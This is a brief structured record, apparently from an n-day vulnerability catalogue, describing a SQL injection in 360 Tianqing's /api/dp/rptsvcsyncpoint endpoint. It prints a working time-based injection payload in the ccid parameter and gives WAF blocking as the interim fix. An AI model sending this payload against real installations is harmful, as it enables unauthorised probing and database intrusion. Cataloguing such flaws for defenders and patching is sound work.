vendor = "360"
name = "360天擎 - sql注入"
type = "SQL注入"
version = "未知"
path = "/api/dp/rptsvcsyncpoint"
detail = "/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "nday"
